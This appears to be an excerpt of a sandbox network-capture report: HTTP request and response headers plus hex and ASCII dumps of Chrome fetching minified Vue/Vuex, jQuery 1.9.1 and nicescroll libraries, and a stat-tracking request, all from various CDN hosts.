                                                                                                                                                          2024-06-09 22:41:10 UTC16384INData Raw: 7d 76 61 72 20 51 6f 2c 74 61 2c 65 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 51 6f 26 26 28 51 6f 3d 21 50 6f 26 26 21 7a 6f 26 26 76 6f 69 64 20 30 21 3d 3d 6e 26 26 22 73 65 72 76 65 72 22 3d 3d 3d 6e 2e 70 72 6f 63 65 73 73 2e 65 6e 76 2e 56 55 45 5f 45 4e 56 29 2c 51 6f 7d 2c 6e 61 3d 50 6f 26 26 77 69 6e 64 6f 77 2e 5f 5f 56 55 45 5f 44 45 56 54 4f 4f 4c 53 5f 47 4c 4f 42 41 4c 5f 48 4f 4f 4b 5f 5f 2c 72 61 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 53 28 53 79 6d 62 6f 6c 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 52 65 66 6c 65 63 74 26 26 53 28 52 65 66 6c 65 63 74 2e 6f 77 6e 4b 65 79 73 29 3b 74 61 3d 22 75 6e 64 65 66 69 6e 65 64
                                                                                                                                                          Data Ascii: }var Qo,ta,ea=function(){return void 0===Qo&&(Qo=!Po&&!zo&&void 0!==n&&"server"===n.process.env.VUE_ENV),Qo},na=Po&&window.__VUE_DEVTOOLS_GLOBAL_HOOK__,ra="undefined"!=typeof Symbol&&S(Symbol)&&"undefined"!=typeof Reflect&&S(Reflect.ownKeys);ta="undefined
                                                                                                                                                          2024-06-09 22:41:10 UTC16384INData Raw: 64 2c 6f 62 6a 65 63 74 2c 70 61 72 61 6d 2c 73 6f 75 72 63 65 2c 63 61 6e 76 61 73 2c 73 63 72 69 70 74 2c 6e 6f 73 63 72 69 70 74 2c 64 65 6c 2c 69 6e 73 2c 63 61 70 74 69 6f 6e 2c 63 6f 6c 2c 63 6f 6c 67 72 6f 75 70 2c 74 61 62 6c 65 2c 74 68 65 61 64 2c 74 62 6f 64 79 2c 74 64 2c 74 68 2c 74 72 2c 62 75 74 74 6f 6e 2c 64 61 74 61 6c 69 73 74 2c 66 69 65 6c 64 73 65 74 2c 66 6f 72 6d 2c 69 6e 70 75 74 2c 6c 61 62 65 6c 2c 6c 65 67 65 6e 64 2c 6d 65 74 65 72 2c 6f 70 74 67 72 6f 75 70 2c 6f 70 74 69 6f 6e 2c 6f 75 74 70 75 74 2c 70 72 6f 67 72 65 73 73 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 2c 64 65 74 61 69 6c 73 2c 64 69 61 6c 6f 67 2c 6d 65 6e 75 2c 6d 65 6e 75 69 74 65 6d 2c 73 75 6d 6d 61 72 79 2c 63 6f 6e 74 65 6e 74 2c 65 6c 65 6d 65 6e
                                                                                                                                                          Data Ascii: d,object,param,source,canvas,script,noscript,del,ins,caption,col,colgroup,table,thead,tbody,td,th,tr,button,datalist,fieldset,form,input,label,legend,meter,optgroup,option,output,progress,select,textarea,details,dialog,menu,menuitem,summary,content,elemen
                                                                                                                                                          2024-06-09 22:41:10 UTC16384INData Raw: 5b 5e 3e 5d 2b 3e 2f 69 2c 59 73 3d 2f 5e 3c 21 5c 2d 2d 2f 2c 57 73 3d 2f 5e 3c 21 5c 5b 2f 2c 5a 73 3d 21 31 3b 22 78 22 2e 72 65 70 6c 61 63 65 28 2f 78 28 2e 29 3f 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 5a 73 3d 22 22 3d 3d 3d 65 7d 29 3b 76 61 72 20 47 73 2c 4b 73 2c 4a 73 2c 58 73 2c 51 73 2c 74 63 2c 65 63 2c 6e 63 2c 72 63 2c 69 63 2c 6f 63 2c 61 63 3d 6d 28 22 73 63 72 69 70 74 2c 73 74 79 6c 65 2c 74 65 78 74 61 72 65 61 22 2c 21 30 29 2c 75 63 3d 7b 7d 2c 73 63 3d 7b 22 26 6c 74 3b 22 3a 22 3c 22 2c 22 26 67 74 3b 22 3a 22 3e 22 2c 22 26 71 75 6f 74 3b 22 3a 27 22 27 2c 22 26 61 6d 70 3b 22 3a 22 26 22 2c 22 26 23 31 30 3b 22 3a 22 5c 6e 22 2c 22 26 23 39 3b 22 3a 22 5c 74 22 7d 2c 63 63 3d 2f 26 28 3f 3a 6c 74 7c 67 74 7c 71 75 6f
                                                                                                                                                          Data Ascii: [^>]+>/i,Ys=/^<!\--/,Ws=/^<!\[/,Zs=!1;"x".replace(/x(.)?/g,function(t,e){Zs=""===e});var Gs,Ks,Js,Xs,Qs,tc,ec,nc,rc,ic,oc,ac=m("script,style,textarea",!0),uc={},sc={"&lt;":"<","&gt;":">","&quot;":'"',"&amp;":"&","&#10;":"\n","&#9;":"\t"},cc=/&(?:lt|gt|quo
                                                                                                                                                          2024-06-09 22:41:10 UTC16384INData Raw: 5b 76 75 65 78 5d 20 6d 75 74 61 74 69 6f 6e 20 74 79 70 65 3a 20 22 2b 61 2b 22 2e 20 53 69 6c 65 6e 74 20 6f 70 74 69 6f 6e 20 68 61 73 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2e 20 55 73 65 20 74 68 65 20 66 69 6c 74 65 72 20 66 75 6e 63 74 69 6f 6e 61 6c 69 74 79 20 69 6e 20 74 68 65 20 76 75 65 2d 64 65 76 74 6f 6f 6c 73 22 29 7d 2c 56 2e 70 72 6f 74 6f 74 79 70 65 2e 64 69 73 70 61 74 63 68 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 69 3d 78 28 65 2c 6e 29 2c 6f 3d 69 2e 74 79 70 65 2c 61 3d 69 2e 70 61 79 6c 6f 61 64 2c 75 3d 7b 74 79 70 65 3a 6f 2c 70 61 79 6c 6f 61 64 3a 61 7d 2c 73 3d 74 68 69 73 2e 5f 61 63 74 69 6f 6e 73 5b 6f 5d 3b 72 65 74 75 72 6e 20 73 3f 28 74 68 69 73 2e 5f 61 63 74 69 6f 6e 53 75 62 73
                                                                                                                                                          Data Ascii: [vuex] mutation type: "+a+". Silent option has been removed. Use the filter functionality in the vue-devtools")},V.prototype.dispatch=function(e,n){var r=this,i=x(e,n),o=i.type,a=i.payload,u={type:o,payload:a},s=this._actions[o];return s?(this._actionSubs
                                                                                                                                                          2024-06-09 22:41:10 UTC16384INData Raw: 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 3b 72 65 74 75 72 6e 7b 78 3a 69 2e 6c 65 66 74 2d 72 2e 6c 65 66 74 2d 65 2e 78 2c 79 3a 69 2e 74 6f 70 2d 72 2e 74 6f 70 2d 65 2e 79 7d 7d 66 75 6e 63 74 69 6f 6e 20 51 28 74 29 7b 72 65 74 75 72 6e 20 6e 74 28 74 2e 78 29 7c 7c 6e 74 28 74 2e 79 29 7d 66 75 6e 63 74 69 6f 6e 20 74 74 28 74 29 7b 72 65 74 75 72 6e 7b 78 3a 6e 74 28 74 2e 78 29 3f 74 2e 78 3a 77 69 6e 64 6f 77 2e 70 61 67 65 58 4f 66 66 73 65 74 2c 79 3a 6e 74 28 74 2e 79 29 3f 74 2e 79 3a 77 69 6e 64 6f 77 2e 70 61 67 65 59 4f 66 66 73 65 74 7d 7d 66 75 6e 63 74 69 6f 6e 20 65 74 28 74 29 7b 72 65 74 75 72 6e 7b 78 3a 6e 74 28 74 2e 78 29 3f 74 2e 78 3a 30 2c 79 3a 6e 74 28 74 2e 79 29 3f 74 2e 79 3a 30 7d 7d 66 75 6e 63 74 69 6f 6e 20
                                                                                                                                                          Data Ascii: ndingClientRect();return{x:i.left-r.left-e.x,y:i.top-r.top-e.y}}function Q(t){return nt(t.x)||nt(t.y)}function tt(t){return{x:nt(t.x)?t.x:window.pageXOffset,y:nt(t.y)?t.y:window.pageYOffset}}function et(t){return{x:nt(t.x)?t.x:0,y:nt(t.y)?t.y:0}}function


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          323192.168.2.55008490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:09 UTC534OUTGET /pc/lib/jquery.min-1.9.1.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:09 UTC645INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:09 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 92630
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 31 Jan 2018 01:18:42 GMT
                                                                                                                                                          ETag: "5a711972-169d6"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[3],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE9[467],EU-GER-frankfurt-GLOBAL1-CACHE1[424,TCP_MISS,465],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: d8c5462175371fe358a86243ff919ca3
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814500
                                                                                                                                                          X-CCDN-Expires: 2400462
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:09 UTC15739INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 31 2e 39 2e 31 20 7c 20 28 63 29 20 32 30 30 35 2c 20 32 30 31 32 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 2c 20 49 6e 63 2e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 2f 2f 40 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 6a 71 75 65 72 79 2e 6d 69 6e 2e 6d 61 70 0a 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 69 3d 74 79 70 65 6f 66 20 74 2c 6f 3d 65 2e 64 6f 63 75 6d 65 6e 74 2c 61 3d 65 2e 6c 6f 63 61 74 69 6f 6e 2c 73 3d 65 2e 6a 51 75 65 72 79 2c 75 3d 65 2e 24 2c 6c 3d 7b 7d 2c 63 3d 5b 5d 2c 70 3d 22 31 2e 39 2e 31 22 2c 66 3d 63 2e 63 6f 6e 63 61 74 2c 64 3d 63 2e 70 75 73 68 2c 68 3d 63 2e 73 6c 69 63 65 2c 67 3d 63 2e 69 6e 64 65 78 4f
                                                                                                                                                          Data Ascii: /*! jQuery v1.9.1 | (c) 2005, 2012 jQuery Foundation, Inc. | jquery.org/license//@ sourceMappingURL=jquery.min.map*/(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexO
                                                                                                                                                          2024-06-09 22:41:10 UTC16384INData Raw: 74 22 3d 3d 74 79 70 65 6f 66 20 65 3f 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 62 2e 64 61 74 61 28 74 68 69 73 2c 65 29 7d 29 3a 62 2e 61 63 63 65 73 73 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 3d 3d 3d 74 3f 6f 3f 57 28 6f 2c 65 2c 62 2e 64 61 74 61 28 6f 2c 65 29 29 3a 6e 75 6c 6c 3a 28 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 62 2e 64 61 74 61 28 74 68 69 73 2c 65 2c 6e 29 7d 29 2c 74 29 7d 2c 6e 75 6c 6c 2c 6e 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 2c 6e 75 6c 6c 2c 21 30 29 7d 2c 72 65 6d 6f 76 65 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 62 2e 72 65 6d 6f 76
                                                                                                                                                          Data Ascii: t"==typeof e?this.each(function(){b.data(this,e)}):b.access(this,function(n){return n===t?o?W(o,e,b.data(o,e)):null:(this.each(function(){b.data(this,e,n)}),t)},null,n,arguments.length>1,null,!0)},removeData:function(e){return this.each(function(){b.remov
                                                                                                                                                          2024-06-09 22:41:10 UTC16384INData Raw: 54 79 70 65 3a 74 2c 62 69 6e 64 54 79 70 65 3a 74 2c 68 61 6e 64 6c 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 2c 72 3d 74 68 69 73 2c 69 3d 65 2e 72 65 6c 61 74 65 64 54 61 72 67 65 74 2c 6f 3d 65 2e 68 61 6e 64 6c 65 4f 62 6a 3b 0a 72 65 74 75 72 6e 28 21 69 7c 7c 69 21 3d 3d 72 26 26 21 62 2e 63 6f 6e 74 61 69 6e 73 28 72 2c 69 29 29 26 26 28 65 2e 74 79 70 65 3d 6f 2e 6f 72 69 67 54 79 70 65 2c 6e 3d 6f 2e 68 61 6e 64 6c 65 72 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 2c 65 2e 74 79 70 65 3d 74 29 2c 6e 7d 7d 7d 29 2c 62 2e 73 75 70 70 6f 72 74 2e 73 75 62 6d 69 74 42 75 62 62 6c 65 73 7c 7c 28 62 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2e 73 75 62 6d 69 74 3d 7b 73 65 74 75 70 3a 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                                                          Data Ascii: Type:t,bindType:t,handle:function(e){var n,r=this,i=e.relatedTarget,o=e.handleObj;return(!i||i!==r&&!b.contains(r,i))&&(e.type=o.origType,n=o.handler.apply(this,arguments),e.type=t),n}}}),b.support.submitBubbles||(b.event.special.submit={setup:function()
                                                                                                                                                          2024-06-09 22:41:10 UTC16384INData Raw: 6e 5d 7d 29 2c 65 76 65 6e 3a 70 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 30 3b 66 6f 72 28 3b 74 3e 6e 3b 6e 2b 3d 32 29 65 2e 70 75 73 68 28 6e 29 3b 72 65 74 75 72 6e 20 65 7d 29 2c 6f 64 64 3a 70 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 31 3b 66 6f 72 28 3b 74 3e 6e 3b 6e 2b 3d 32 29 65 2e 70 75 73 68 28 6e 29 3b 72 65 74 75 72 6e 20 65 7d 29 2c 6c 74 3a 70 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 30 3e 6e 3f 6e 2b 74 3a 6e 3b 66 6f 72 28 3b 2d 2d 72 3e 3d 30 3b 29 65 2e 70 75 73 68 28 72 29 3b 72 65 74 75 72 6e 20 65 7d 29 2c 67 74 3a 70 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 30 3e 6e 3f 6e 2b 74 3a 6e 3b 66 6f 72 28 3b 74 3e 2b 2b 72 3b
                                                                                                                                                          Data Ascii: n]}),even:pt(function(e,t){var n=0;for(;t>n;n+=2)e.push(n);return e}),odd:pt(function(e,t){var n=1;for(;t>n;n+=2)e.push(n);return e}),lt:pt(function(e,t,n){var r=0>n?n+t:n;for(;--r>=0;)e.push(r);return e}),gt:pt(function(e,t,n){var r=0>n?n+t:n;for(;t>++r;
                                                                                                                                                          2024-06-09 22:41:10 UTC16384INData Raw: 74 65 20 6c 5b 6f 5d 2c 70 3f 64 65 6c 65 74 65 20 6e 5b 75 5d 3a 74 79 70 65 6f 66 20 6e 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 21 3d 3d 69 3f 6e 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 75 29 3a 6e 5b 75 5d 3d 6e 75 6c 6c 2c 63 2e 70 75 73 68 28 6f 29 29 7d 7d 7d 29 3b 76 61 72 20 50 74 2c 52 74 2c 57 74 2c 24 74 3d 2f 61 6c 70 68 61 5c 28 5b 5e 29 5d 2a 5c 29 2f 69 2c 49 74 3d 2f 6f 70 61 63 69 74 79 5c 73 2a 3d 5c 73 2a 28 5b 5e 29 5d 2a 29 2f 2c 7a 74 3d 2f 5e 28 74 6f 70 7c 72 69 67 68 74 7c 62 6f 74 74 6f 6d 7c 6c 65 66 74 29 24 2f 2c 58 74 3d 2f 5e 28 6e 6f 6e 65 7c 74 61 62 6c 65 28 3f 21 2d 63 5b 65 61 5d 29 2e 2b 29 2f 2c 55 74 3d 2f 5e 6d 61 72 67 69 6e 2f 2c 56 74 3d 52 65 67 45 78 70 28 22 5e 28 22 2b 78 2b 22 29 28 2e 2a
                                                                                                                                                          Data Ascii: te l[o],p?delete n[u]:typeof n.removeAttribute!==i?n.removeAttribute(u):n[u]=null,c.push(o))}}});var Pt,Rt,Wt,$t=/alpha\([^)]*\)/i,It=/opacity\s*=\s*([^)]*)/,zt=/^(top|right|bottom|left)$/,Xt=/^(none|table(?!-c[ea]).+)/,Ut=/^margin/,Vt=RegExp("^("+x+")(.*
                                                                                                                                                          2024-06-09 22:41:10 UTC11355INData Raw: 6e 63 74 69 6f 6e 20 49 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 6e 65 77 20 65 2e 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 7d 63 61 74 63 68 28 74 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 7a 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 6e 65 77 20 65 2e 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 7d 62 2e 61 6a 61 78 53 65 74 74 69 6e 67 73 2e 78 68 72 3d 65 2e 41 63 74 69 76 65 58 4f 62 6a 65 63 74 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 74 68 69 73 2e 69 73 4c 6f 63 61 6c 26 26 49 6e 28 29 7c 7c 7a 6e 28 29 7d 3a 49 6e 2c 52 6e 3d 62 2e 61 6a 61 78 53 65 74 74 69 6e 67 73 2e 78 68 72 28 29 2c 62 2e 73 75 70 70 6f 72 74 2e 63 6f 72 73 3d 21 21
                                                                                                                                                          Data Ascii: nction In(){try{return new e.XMLHttpRequest}catch(t){}}function zn(){try{return new e.ActiveXObject("Microsoft.XMLHTTP")}catch(t){}}b.ajaxSettings.xhr=e.ActiveXObject?function(){return!this.isLocal&&In()||zn()}:In,Rn=b.ajaxSettings.xhr(),b.support.cors=!!


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          324192.168.2.550087183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:09 UTC560OUTGET /ftl/commonPage/js/jquery/jquery.nicescroll.min.js HTTP/1.1
                                                                                                                                                          Host: 8vpfnx.eveday.me
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://e933002.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:10 UTC704INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Content-Length: 64651
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-XY-MP-04-04
                                                                                                                                                          ETag: "5d848f4f-fc8b"
                                                                                                                                                          Date: Sat, 08 Jun 2024 15:42:18 GMT
                                                                                                                                                          Last-Modified: Fri, 20 Sep 2019 08:35:27 GMT
                                                                                                                                                          Expires: Mon, 08 Jul 2024 15:42:18 GMT
                                                                                                                                                          Age: 111531
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-205
                                                                                                                                                          x-link-via: dgct63:443;xymp04:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-XY-MP-04-04
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-19
                                                                                                                                                          X-Cdn-Request-ID: b3d6830eedecca75f4c641484388067a
                                                                                                                                                          2024-06-09 22:41:10 UTC15680INData Raw: 2f 2a 20 6e 69 63 65 73 63 72 6f 6c 6c 20 76 33 2e 37 2e 30 20 49 6e 75 59 61 6b 73 61 20 2d 20 4d 49 54 20 2d 20 68 74 74 70 3a 2f 2f 6e 69 63 65 73 63 72 6f 6c 6c 2e 61 72 65 61 61 70 65 72 74 61 2e 63 6f 6d 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 65 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 72 65 71 75 69 72 65 28 22 6a 71 75 65 72 79 22 29 29 3a 65 28 6a 51 75 65 72 79 29 7d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6f 3d 21 31 2c 74 3d 21
                                                                                                                                                          Data Ascii: /* nicescroll v3.7.0 InuYaksa - MIT - http://nicescroll.areaaperta.com */!function(e){"function"==typeof define&&define.amd?define(["jquery"],e):"object"==typeof exports?module.exports=e(require("jquery")):e(jQuery)}(function(e){"use strict";var o=!1,t=!
                                                                                                                                                          2024-06-09 22:41:10 UTC16384INData Raw: 69 6f 6e 66 72 61 6d 65 3d 22 72 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 22 69 6e 20 77 69 6e 64 6f 77 2c 62 2e 68 61 73 63 61 6e 63 65 6c 61 6e 69 6d 61 74 69 6f 6e 66 72 61 6d 65 3d 22 63 61 6e 63 65 6c 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 22 69 6e 20 77 69 6e 64 6f 77 2c 74 68 69 73 2e 69 6e 69 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 62 2e 73 61 76 65 64 2e 63 73 73 3d 5b 5d 2c 7a 2e 69 73 69 65 37 6d 6f 62 69 6c 65 29 72 65 74 75 72 6e 21 30 3b 69 66 28 7a 2e 69 73 6f 70 65 72 61 6d 69 6e 69 29 72 65 74 75 72 6e 21 30 3b 69 66 28 7a 2e 69 73 61 6e 64 72 6f 69 64 26 26 21 28 22 68 69 64 64 65 6e 22 69 6e 20 64 6f 63 75 6d 65 6e 74 29 29 72 65 74 75 72 6e 21 30 3b 76 61 72 20 65 3d 7a 2e 69 73 6d 6f 64 65 72 6e 69 65 7c
                                                                                                                                                          Data Ascii: ionframe="requestAnimationFrame"in window,b.hascancelanimationframe="cancelAnimationFrame"in window,this.init=function(){if(b.saved.css=[],z.isie7mobile)return!0;if(z.isoperamini)return!0;if(z.isandroid&&!("hidden"in document))return!0;var e=z.ismodernie|
                                                                                                                                                          2024-06-09 22:41:10 UTC16384INData Raw: 22 6d 6f 75 73 65 6d 6f 76 65 22 2c 62 2e 6f 6e 74 6f 75 63 68 6d 6f 76 65 2c 21 31 2c 21 30 29 29 2c 28 62 2e 6f 70 74 2e 63 75 72 73 6f 72 64 72 61 67 6f 6e 74 6f 75 63 68 7c 7c 21 7a 2e 63 61 6e 74 6f 75 63 68 26 26 21 62 2e 6f 70 74 2e 65 6d 75 6c 61 74 65 74 6f 75 63 68 29 26 26 28 62 2e 72 61 69 6c 2e 63 73 73 28 7b 63 75 72 73 6f 72 3a 22 64 65 66 61 75 6c 74 22 7d 29 2c 62 2e 72 61 69 6c 68 26 26 62 2e 72 61 69 6c 68 2e 63 73 73 28 7b 63 75 72 73 6f 72 3a 22 64 65 66 61 75 6c 74 22 7d 29 2c 62 2e 6a 71 62 69 6e 64 28 62 2e 72 61 69 6c 2c 22 6d 6f 75 73 65 65 6e 74 65 72 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 62 2e 69 73 70 61 67 65 26 26 21 62 2e 77 69 6e 2e 69 73 28 22 3a 76 69 73 69 62 6c 65 22 29 29 72 65 74 75 72 6e 21 31 3b 62 2e
                                                                                                                                                          Data Ascii: "mousemove",b.ontouchmove,!1,!0)),(b.opt.cursordragontouch||!z.cantouch&&!b.opt.emulatetouch)&&(b.rail.css({cursor:"default"}),b.railh&&b.railh.css({cursor:"default"}),b.jqbind(b.rail,"mouseenter",function(){if(!b.ispage&&!b.win.is(":visible"))return!1;b.
                                                                                                                                                          2024-06-09 22:41:10 UTC16203INData Raw: 2e 69 64 29 7b 64 65 6c 65 74 65 20 72 5b 65 5d 3b 66 6f 72 28 76 61 72 20 6f 3d 2b 2b 65 3b 6f 3c 72 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 2c 65 2b 2b 29 72 5b 65 5d 3d 72 5b 6f 5d 3b 2d 2d 72 2e 6c 65 6e 67 74 68 26 26 64 65 6c 65 74 65 20 72 5b 72 2e 6c 65 6e 67 74 68 5d 7d 7d 29 3b 66 6f 72 28 76 61 72 20 69 20 69 6e 20 62 29 62 5b 69 5d 3d 6e 75 6c 6c 2c 64 65 6c 65 74 65 20 62 5b 69 5d 3b 62 3d 6e 75 6c 6c 7d 2c 74 68 69 73 2e 73 63 72 6f 6c 6c 73 74 61 72 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6f 6e 73 63 72 6f 6c 6c 73 74 61 72 74 3d 65 2c 62 7d 2c 74 68 69 73 2e 73 63 72 6f 6c 6c 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6f 6e 73 63 72 6f 6c 6c 65 6e 64 3d 65 2c 62 7d 2c
                                                                                                                                                          Data Ascii: .id){delete r[e];for(var o=++e;o<r.length;o++,e++)r[e]=r[o];--r.length&&delete r[r.length]}});for(var i in b)b[i]=null,delete b[i];b=null},this.scrollstart=function(e){return this.onscrollstart=e,b},this.scrollend=function(e){return this.onscrollend=e,b},


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          325192.168.2.550078103.117.134.214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:09 UTC425OUTGET /zb-cloud/stat.do?pv=ajax&pa=host.info&domain=wns732.cc&terminal=1&r=3425276221 HTTP/1.1
                                                                                                                                                          Host: ocsapi-lc.tingmeikj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
